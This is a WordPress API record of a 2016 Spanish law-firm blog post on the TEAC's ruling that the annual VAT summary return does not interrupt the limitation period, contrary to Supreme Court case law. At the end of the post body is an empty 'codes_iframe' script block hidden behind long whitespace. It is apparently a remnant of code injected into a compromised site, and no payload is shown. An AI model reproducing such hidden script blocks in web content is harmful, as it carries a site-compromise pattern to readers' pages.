{"id":11744,"date":"2016-11-28T18:36:11","date_gmt":"2016-11-28T17:36:11","guid":{"rendered":"http:\/\/fmsb.disstintbeta.com\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/"},"modified":"2016-11-28T18:36:11","modified_gmt":"2016-11-28T17:36:11","slug":"controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva","status":"publish","type":"post","link":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/","title":{"rendered":"Controversia TEAC &#8211; TS respecto de la prescripci\u00f3n en el IVA."},"content":{"rendered":"<h3 style=\"text-align: justify;\"><strong>El TEAC resuelve que la declaraci\u00f3n-resumen anual de IVA no interrumpe el plazo de prescripci\u00f3n, en contra de la Jurisprudencia del Tribunal Supremo.<\/strong><\/h3>\n<p style=\"text-align: justify;\">Hasta el momento, el <strong>Tribunal Supremo<\/strong> ha venido declarando que la presentaci\u00f3n de la <strong>declaraci\u00f3n-resumen anual del IVA interrumpe la prescripci\u00f3n de todos los periodos de liquidaci\u00f3n <\/strong>de IVA de ese ejercicio.<\/p>\n<p style=\"text-align: justify;\">El Tribunal Supremo atribuye a la declaraci\u00f3n-resumen anual del IVA un efecto interruptivo de la prescripci\u00f3n del impuesto porque considera que \u00e9sta implica una<strong> ratificaci\u00f3n <\/strong>de las<strong> declaraciones-liquidaciones presentadas a lo largo del ejercicio<\/strong>. La circunstancia esencial que pone de manifiesto el Tribunal Supremo como motivo del efecto interruptivo es la <strong>necesidad u obligaci\u00f3n<\/strong> <strong>de acompa\u00f1ar<\/strong> con la declaraci\u00f3n-resumen del IVA, las <strong>declaraciones-liquidaciones<\/strong> presentadas en cada periodo de ese ejercicio.<\/p>\n<p style=\"text-align: justify;\">No obstante lo anterior, <strong>el TEAC<\/strong>, en contra del criterio seguido por el Tribunal Supremo, en su <u>Resoluci\u00f3n de 22 de septiembre de 2016<\/u>, concluye que el <strong>modelo de declaraci\u00f3n-resumen anual no interrumpe el plazo de prescripci\u00f3n<\/strong> del derecho de la Administraci\u00f3n para comprobar y liquidar <strong>todos los periodos de liquidaci\u00f3n de IVA<\/strong> del ejercicio concreto, sino que habr\u00e1 que estar al concreto plazo de prescripci\u00f3n de la declaraci\u00f3n-liquidaci\u00f3n de cada periodo independiente.<\/p>\n<p style=\"text-align: justify;\">Los <strong>motivos<\/strong> en los que el TEAC se fundamenta para llegar a la anterior conclusi\u00f3n son los siguientes:<\/p>\n<ol style=\"text-align: justify;\">\n<li>Las <strong>declaraciones-liquidaciones<\/strong> \u2013tanto mensuales, como trimestrales- son una obligaci\u00f3n formal <strong>necesaria<\/strong> para cumplir la obligaci\u00f3n material de la liquidaci\u00f3n o <strong>pago de la deuda tributaria<\/strong>.<\/li>\n<\/ol>\n<ol style=\"text-align: justify;\" start=\"2\">\n<li>En la actualidad <strong>no es obligatorio aportar<\/strong> junto con la declaraci\u00f3n-resumen anual uno de los ejemplares de <strong>cada uno de los modelos de declaraci\u00f3n-liquidaci\u00f3n de cada periodo<\/strong> presentados a lo largo del ejercicio.<\/li>\n<\/ol>\n<ol style=\"text-align: justify;\" start=\"3\">\n<li>La <strong>declaraci\u00f3n-resumen anual <\/strong>no tiene un objetivo liquidatorio<strong>, <\/strong>sino que tiene como <strong>finalidad suministrar informaci\u00f3n ya declarada<\/strong> en las autoliquidaciones mensuales o trimestrales. Sin que esto suponga una ratificaci\u00f3n de lo ya incluido en las citadas liquidaciones peri\u00f3dicas.<\/li>\n<\/ol>\n<p style=\"text-align: justify;\">Adem\u00e1s, con la declaraci\u00f3n-resumen anual se aporta <strong>nueva informaci\u00f3n a la Administraci\u00f3n Tributaria<\/strong>. Informaci\u00f3n que <strong>incide de manera esencial en la \u00faltima declaraci\u00f3n-liquidaci\u00f3n<\/strong>, con la que el periodo de presentaci\u00f3n es coincidente, pues se refiere a las regularizaciones que el sujeto pasivo del IVA debe efectuar en esta \u00faltima declaraci\u00f3n-liquidaci\u00f3n.<\/p>\n<p style=\"text-align: justify;\">De todo lo expuesto, <strong>concluimos<\/strong> que la nueva l\u00ednea de resoluci\u00f3n del TEAC defiende que la declaraci\u00f3n-resumen anual no tiene contenido liquidatorio, sino que supone el cumplimiento por el obligado tributario de una obligaci\u00f3n que facilita la gesti\u00f3n del Impuesto a la Administraci\u00f3n.<\/p>\n<p style=\"text-align: justify;\">En base a todo lo anterior, el TEAC considera que la <strong><u>declaraci\u00f3n-resumen anual no tiene capacidad de interrumpir el plazo de prescripci\u00f3n del derecho de la Administraci\u00f3n para determinar la deuda tributaria <\/u><\/strong>a trav\u00e9s de la oportuna liquidaci\u00f3n<strong><u>, sino que hay que atender al plazo de prescripci\u00f3n de cada una de las declaraciones-liquidaciones peri\u00f3dicas presentadas en ese ejercicio<\/u><\/strong>.<\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\">                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El TEAC resuelve que la declaraci\u00f3n-resumen anual de IVA no interrumpe el plazo de prescripci\u00f3n, en contra de la Jurisprudencia del Tribunal Supremo. Hasta el momento, el Tribunal Supremo ha venido declarando que la presentaci\u00f3n de la declaraci\u00f3n-resumen anual del IVA interrumpe la prescripci\u00f3n de todos los periodos de liquidaci\u00f3n de IVA de ese ejercicio. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8664,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2250,2152],"tags":[],"class_list":["post-11744","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-derecho-fiscal-en","category-home-en-2"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Controversia TEAC - TS respecto de la prescripci\u00f3n en el IVA. - FMSB Abogados y Economistas en Baleares<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Controversia TEAC - TS respecto de la prescripci\u00f3n en el IVA. - FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"og:description\" content=\"El TEAC resuelve que la declaraci\u00f3n-resumen anual de IVA no interrumpe el plazo de prescripci\u00f3n, en contra de la Jurisprudencia del Tribunal Supremo. Hasta el momento, el Tribunal Supremo ha venido declarando que la presentaci\u00f3n de la declaraci\u00f3n-resumen anual del IVA interrumpe la prescripci\u00f3n de todos los periodos de liquidaci\u00f3n de IVA de ese ejercicio. [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/\" \/>\n<meta property=\"og:site_name\" content=\"FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"article:published_time\" content=\"2016-11-28T17:36:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/11\/TEAC-600x400-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"fmsb\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@fmsb-disstint\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"fmsb\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/\"},\"author\":{\"name\":\"fmsb\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\"},\"headline\":\"Controversia TEAC &#8211; TS respecto de la prescripci\u00f3n en el IVA.\",\"datePublished\":\"2016-11-28T17:36:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/\"},\"wordCount\":527,\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/11\\\/TEAC-600x400-1.jpg\",\"articleSection\":[\"Derecho Fiscal\",\"Home\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/\",\"name\":\"Controversia TEAC - TS respecto de la prescripci\u00f3n en el IVA. - FMSB Abogados y Economistas en Baleares\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/11\\\/TEAC-600x400-1.jpg\",\"datePublished\":\"2016-11-28T17:36:11+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/#primaryimage\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/11\\\/TEAC-600x400-1.jpg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2016\\\/11\\\/TEAC-600x400-1.jpg\",\"width\":600,\"height\":400},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2016\\\/11\\\/28\\\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Controversia TEAC &#8211; TS respecto de la prescripci\u00f3n en el IVA.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"width\":154,\"height\":52,\"caption\":\"FMSB Abogados y Economistas en Baleares\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\",\"name\":\"fmsb\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"caption\":\"fmsb\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/fmsb-disstint\"],\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/author\\\/fmsb\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Controversia TEAC - TS respecto de la prescripci\u00f3n en el IVA. - FMSB Abogados y Economistas en Baleares","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/","og_locale":"en_US","og_type":"article","og_title":"Controversia TEAC - TS respecto de la prescripci\u00f3n en el IVA. - FMSB Abogados y Economistas en Baleares","og_description":"El TEAC resuelve que la declaraci\u00f3n-resumen anual de IVA no interrumpe el plazo de prescripci\u00f3n, en contra de la Jurisprudencia del Tribunal Supremo. Hasta el momento, el Tribunal Supremo ha venido declarando que la presentaci\u00f3n de la declaraci\u00f3n-resumen anual del IVA interrumpe la prescripci\u00f3n de todos los periodos de liquidaci\u00f3n de IVA de ese ejercicio. [&hellip;]","og_url":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/","og_site_name":"FMSB Abogados y Economistas en Baleares","article_published_time":"2016-11-28T17:36:11+00:00","og_image":[{"width":600,"height":400,"url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/11\/TEAC-600x400-1.jpg","type":"image\/jpeg"}],"author":"fmsb","twitter_card":"summary_large_image","twitter_creator":"@fmsb-disstint","twitter_misc":{"Written by":"fmsb","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/#article","isPartOf":{"@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/"},"author":{"name":"fmsb","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2"},"headline":"Controversia TEAC &#8211; TS respecto de la prescripci\u00f3n en el IVA.","datePublished":"2016-11-28T17:36:11+00:00","mainEntityOfPage":{"@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/"},"wordCount":527,"publisher":{"@id":"https:\/\/fmsb.eu\/en\/#organization"},"image":{"@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/11\/TEAC-600x400-1.jpg","articleSection":["Derecho Fiscal","Home"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/","url":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/","name":"Controversia TEAC - TS respecto de la prescripci\u00f3n en el IVA. - FMSB Abogados y Economistas en Baleares","isPartOf":{"@id":"https:\/\/fmsb.eu\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/#primaryimage"},"image":{"@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/11\/TEAC-600x400-1.jpg","datePublished":"2016-11-28T17:36:11+00:00","breadcrumb":{"@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/#primaryimage","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/11\/TEAC-600x400-1.jpg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2016\/11\/TEAC-600x400-1.jpg","width":600,"height":400},{"@type":"BreadcrumbList","@id":"https:\/\/fmsb.eu\/en\/2016\/11\/28\/controversia-teac-ts-respecto-de-la-prescripcion-en-el-iva\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/fmsb.eu\/en\/"},{"@type":"ListItem","position":2,"name":"Controversia TEAC &#8211; TS respecto de la prescripci\u00f3n en el IVA."}]},{"@type":"WebSite","@id":"https:\/\/fmsb.eu\/en\/#website","url":"https:\/\/fmsb.eu\/en\/","name":"FMSB Abogados y Economistas en Baleares","description":"","publisher":{"@id":"https:\/\/fmsb.eu\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fmsb.eu\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/fmsb.eu\/en\/#organization","name":"FMSB Abogados y Economistas en Baleares","url":"https:\/\/fmsb.eu\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/logo\/image\/","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","width":154,"height":52,"caption":"FMSB Abogados y Economistas en Baleares"},"image":{"@id":"https:\/\/fmsb.eu\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2","name":"fmsb","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","caption":"fmsb"},"sameAs":["https:\/\/x.com\/fmsb-disstint"],"url":"https:\/\/fmsb.eu\/en\/author\/fmsb\/"}]}},"_links":{"self":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts\/11744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/comments?post=11744"}],"version-history":[{"count":0,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts\/11744\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/media\/8664"}],"wp:attachment":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/media?parent=11744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/categories?post=11744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/tags?post=11744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}